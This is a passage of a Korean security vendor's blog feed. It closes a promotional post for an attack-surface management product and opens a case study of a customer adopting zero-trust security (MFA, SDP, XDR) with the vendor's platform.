&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/product/asm&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 ASM&lt;/a&gt;은 다음과 같은 영역을 중심으로 가시성을 제공합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;외부에 노출된 서버, 도메인, IP, 웹 서비스 자동 탐지&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;관리되지 않는 섀도 IT 및 오래된 서비스 포인트 식별&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;취약점&amp;middot;노출 위험도 기반 우선순위 분석&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어&amp;middot;계정 탈취&amp;middot;초기 침투 가능 지점 사전 파악&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;클라우드&amp;middot;SaaS&amp;middot;원격 근무 환경이 일상화된 지금, 사고 이후 대응보다 사전 가시성 확보가 훨씬 현실적인 보안 전략이 되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어를 '막을 수 있을까' 고민하기 전에, 어디서부터 공격받을 수 있는지 알고 계신가요?&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;ASM은 이제 선택이 아닌, 랜섬웨어 대응과 보안 프레임워크&amp;middot;사이버 보험 대응을 위한 기본 조건이 되고 있습니다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;지금 우리 조직의 공격 표면은 얼마나 노출되어 있을까요? 알약 ASM으로 기업의 외부 노출 자산을 진단하고, 실제 위협 관점에서 대응 전략을 설계해보세요.&amp;nbsp;&lt;a href=&quot;https://forms.office.com/r/AvGuFtwU3V&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;무료 컨설팅 신청하기(Click)&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;이제 보안 프레임워크는 &amp;lsquo;권고&amp;rsquo;가 아닌 &amp;lsquo;생존 전략&amp;rsquo;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보고서는 또 하나의 중요한 변화를 짚고 있습니다. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;과거에는 번거롭게 여겨졌던 NIST, CSA(Cloud Control Matrix) 등 보안 프레임워크가 이제는 필수 요건으로 자리 잡고 있다는 점입니다. &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;사이버 보험 청구 시에도 평소 규정 준수 여부가 핵심 판단 기준이 되고 있으며, 보안 표준을 갖추지 못한 조직은 사고 이후에도 보호받기 어려운 환경에 놓이게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;랜섬웨어의 해답은 &amp;lsquo;사전 대응&amp;rsquo;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어는 더 이상 몸값을 지불해 해결할 수 있는 문제가 아닙니다. 복구 성공률 54.3%라는 수치는 사전 대비 없는 대응이 얼마나 위험한 선택인지를 명확히 보여줍니다. 이제 기업 보안의 중심은 얼마나 빨리 복구하느냐가 아니라 얼마나 공격받지 않도록 준비했는가로 이동하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;공격 표면을 정확히 파악하고, 노출된 지점을 관리하며, 보안 프레임워크 기반의 체계를 갖추는 것.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이것이 2026년 현재, 기업 보안의 현실적인 생존 전략입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;연초는 공격자들이 가장 활발하게 움직이는 시기이기도 합니다. 안전한 한 해를 보내기 위해 지금,&amp;nbsp;우리 조직의 보안 상태를 한 번 더 점검해보시기 바랍니다. 이스트시큐리티는 앞으로도 변화하는 위협 환경 속에서, 기업이 보다 안전하게 한 해를 마무리하고 새로운 해를 맞이할 수 있도록 보안 인사이트와 대응 전략을 지속적으로 제공하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://forms.office.com/r/AvGuFtwU3V&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cqpE3W/dJMcabwab7F/PXcjRrwbTd7cevLKbzGsV1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcqpE3W%2FdJMcabwab7F%2FPXcjRrwbTd7cevLKbzGsV1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;74&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;[참고 출처]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;TechNewsTT, &lt;a href=&quot;https://technewstt.com/bd1545-cyberedge-reports-cybersecurity-trends/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&amp;lt;Cyberedge reports on cybersecurity trends&amp;gt;&lt;/a&gt; 2026.1.12&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>asm</category>
      <category>공격표면관리</category>
      <category>기업보안</category>
      <category>데이터유출</category>
      <category>랜섬웨어</category>
      <category>랜섬웨어대응전략</category>
      <category>보안컨설팅</category>
      <category>알약ASM</category>
      <category>이스트시큐리티</category>
      <category>통합보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5701</guid>
      <comments>https://alyacofficialblog.tistory.com/5701#entry5701comment</comments>
      <pubDate>Wed, 14 Jan 2026 16:12:40 +0900</pubDate>
    </item>
    <item>
      <title>서비스 고객 도입망, 왜 제로트러스트로 바뀌고 있을까?&amp;ndash; 다수 고객 환경에서 달라진 보안 기준</title>
      <link>https://alyacofficialblog.tistory.com/5700</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;SaaS, DaaS, 클라우드 기반 서비스가 확산되면서 기업 IT 환경은 빠르게 변화하고 있습니다. 특히 하나의 인프라에서 &lt;span&gt;다수 고객을 동시에 지원하는 서비스 기업&lt;/span&gt;의 경우, 보안 사고 한 번이 곧 신뢰도 하락과 직결되는 구조가 되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 보안 트렌드가 단순한 &amp;lsquo;외부 침입 차단&amp;rsquo;에서 &lt;span&gt;사용자 접근과 행위 전반을 통제하는 구조&lt;/span&gt;로 이동하는 이유도 여기에 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;page_05 (2).png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;561&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/tBIHd/dJMcahC7VSD/HFIF28yWwH91PieVatJELk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/tBIHd/dJMcahC7VSD/HFIF28yWwH91PieVatJELk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/tBIHd/dJMcahC7VSD/HFIF28yWwH91PieVatJELk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FtBIHd%2FdJMcahC7VSD%2FHFIF28yWwH91PieVatJELk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;561&quot; data-filename=&quot;page_05 (2).png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;561&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;'접속은 막았는데, 그 다음은요?'&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;- 서비스형 IT 환경이 마주한 새로운 보안 과제&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서비스 기업의 IT 환경은 일반 사내망과 다릅니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;외부 고객, 협력사, 내부 운영 인력이 혼재&lt;/li&gt;
&lt;li&gt;클라우드&amp;middot;가상 환경 기반의 상시 접속 구조&lt;/li&gt;
&lt;li&gt;사용자 계정 탈취, 단말 감염이 곧 서비스 침해로 이어질 수 있는 환경&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기존 VPN이나 단순 인증 중심의 보안 체계는 &lt;span&gt;&lt;b&gt;&amp;lsquo;접속 여부&amp;rsquo;까지만 통제&lt;/b&gt;&lt;/span&gt;할 수 있을 뿐, 접속 이후 발생하는 행위와 내부 확산까지는 충분히 관리하기 어려웠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이러한 한계를 해결하기 위해 B 고객사는 &lt;span&gt;&lt;b&gt;제로트러스트 기반 통합 보안 체계&lt;/b&gt;&lt;/span&gt; 도입을 검토하게 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;서비스 고객 도입망에 제로트러스트 통합 보안 체계 구축 사례&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;B 고객사는 공공기관, 대기업, 중소기업 등 국내 다수 고객을 대상으로 클라우드 기반 서비스를 제공하는 기업입니다. 서비스 특성상 외부 공격이나 계정 탈취 사고 발생 시, &lt;span&gt;단일 고객을 넘어 다수 고객에게 영향을 미칠 수 있는 구조&lt;/span&gt;였으며, 사용자 접근 관리와 서비스 운영 환경 전반에 대한 보안 통제 강화가 주요 과제였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✅ 도입 배경의 핵심 - 제로트러스트를 '운영 구조'로 구현하다&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;서비스 고객 도입망 환경에서 사용자 접근 통제 기준 강화 필요&lt;/li&gt;
&lt;li&gt;DaaS&amp;middot;가상 환경 전반의 보안 상태를 지속적으로 확인할 수 있는 구조 요구&lt;/li&gt;
&lt;li&gt;&lt;span&gt;단순 인증이 아닌, &lt;/span&gt;&lt;b&gt;접근 이후 행위까지 관리 가능한 체계&lt;/b&gt;&lt;span&gt; 필요&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;B 고객사는 제로트러스트를 특정 보안 솔루션 하나로 해결하기보다, &lt;span&gt;&lt;b&gt;접근&amp;ndash;인증&amp;ndash;행위&amp;ndash;탐지까지 하나의 흐름으로 연결하는 구조&lt;/b&gt;&lt;/span&gt;를 선택했습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;B고객사 (1).png&quot; data-origin-width=&quot;3600&quot; data-origin-height=&quot;1680&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cuhRua/dJMcagxscOg/z5Ehlyf06QwjN6TTNK7fu0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cuhRua/dJMcagxscOg/z5Ehlyf06QwjN6TTNK7fu0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cuhRua/dJMcagxscOg/z5Ehlyf06QwjN6TTNK7fu0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcuhRua%2FdJMcagxscOg%2Fz5Ehlyf06QwjN6TTNK7fu0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;3600&quot; height=&quot;1680&quot; data-filename=&quot;B고객사 (1).png&quot; data-origin-width=&quot;3600&quot; data-origin-height=&quot;1680&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✅ 구축 핵심 포인트&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;FIDO2 기반 MFA 적용&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;클라우드 및 가상 환경에서 핵심 작업 수행 시, 사용자 인증 단계부터 강화하여 계정 탈취 위험을 최소화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;DaaS 환경 단말 무결성 강화 및 실시간 모니터링&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자의 단말 상태와 악성코드 감염 여부를 지속적으로 확인해, 위험 단말의 접근을 선제적으로 통제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;SPA 기반 인증 이후 SDP&amp;middot;MS를 통한 접근 인가&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;외부 접근 시 인증된 사용자만 서비스 자원에 접근하도록 설계하고, 접근 범위를 최소 단위로 세분화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;XDR 기반 통합 탐지&amp;middot;모니터링 연계&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자 접근, 데이터 이용, 행위 정보를 통합 분석해 이상 징후를 빠르게 식별하고 대응 가능하도록 구성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 모든 흐름을 하나의 정책 체계로 연결한 것이 &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 ZePP&lt;/a&gt; 기반 제로트러스트 통합 보안 구조입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✅ 도입 효과 - '접속을 허용하는 보안'에서 '상태를 관리하는 보안'으로&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;B 고객사는 이번 구축을 통해 다음과 같은 변화를 경험하고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span&gt;서비스 고객 도입망 환경에서&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;사용자 접근 관리 체계가 명확해짐&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;DaaS 및 클라우드 환경 전반의 보안 상태를&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span&gt;&lt;b&gt;지속적으로 점검할 수 있는 운영 구조 확보&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;다수 고객을 대상으로 하는 서비스 환경에서도&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span&gt;&lt;b&gt;안정적인 보안 운영 기반 마련&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 단순히 &amp;lsquo;누가 접속했는지&amp;rsquo;를 확인하는 수준을 넘어, &lt;span&gt;&lt;b&gt;어떤 상태의 단말이, 어떤 행위로 서비스 자원에 접근하는지&lt;/b&gt;&lt;/span&gt;를 지속적으로 관리할 수 있게 되었다는 점이 가장 큰 변화입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;서비스형 IT 환경에서 제로트러스트가 중요한 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 보안 사고의 상당수는 외부 침입 이후, 내부에서 정상 계정과 권한을 활용해 확산됩니다. 서비스 기업일수록 이러한 사고는 단일 시스템 문제가 아니라 &lt;span&gt;비즈니스 신뢰 전체를 흔드는 리스크&lt;/span&gt;로 이어질 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
